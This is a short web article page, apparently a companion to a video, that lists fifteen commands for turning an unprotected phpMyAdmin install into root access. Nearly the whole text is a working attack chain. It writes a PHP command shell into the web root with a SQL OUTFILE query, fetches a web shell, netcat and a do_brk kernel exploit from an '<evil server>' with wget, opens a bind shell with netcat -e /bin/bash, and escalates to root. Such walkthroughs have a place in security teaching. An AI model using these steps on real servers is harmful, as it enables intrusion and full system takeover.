Home > Articles > Programming > PHP

  • Print
  • + Share This
Like this article? We recommend The Visuals

The Visuals

The following video details the steps taken to turn an unprotected phpMyAdmin interface into root access. Also included are the various URLs and commands in line for your review.

You need to upgrade your Flash Player. You need version 9 or above to view this video. You may download it here. You may also see this message if you have JavaScript turned off. If this is the case, please enable JavaScript and reload the page.

Download this .mpg file (49.6 MB)

  1. http://<target>
  2. http:// <target>/phpmyadmin
  3. select "<? system($_REQUEST['cmd']); ?>" into outfile "/opt/lampp/htdocs/cmd.php";
  4. http:// <target>/cmd.php?cmd=wget http:// <evil server>/madshell.txt –O madshell.php
  5. http:// <target>/madshell.php
  6. http:// <target>/cmd.php?cmd=wget http:// <evil server>/netcat.txt –O netcat
  7. http:// <target>/cmd.php?cmd=chmod 777 netcat
  8. execute ./nc -l -vvv -p 12345 -e /bin/bash
  9. Windows cmdline nc <target>12345
  10. http:// <target>/cmd.php?cmd=wget http://<evil server>/do_brk-exploit.txt –O do_brk
  11. http:// <target>/cmd.php?cmd=chmod 777 do_brk
  12. http:// <target>/cmd.php?cmd=ls –l
  13. Target cmdline whoami
  14. Target cmdline ./do_brk
  15. Target cmdline whoami
  • + Share This
  • 🔖 Save To Your Account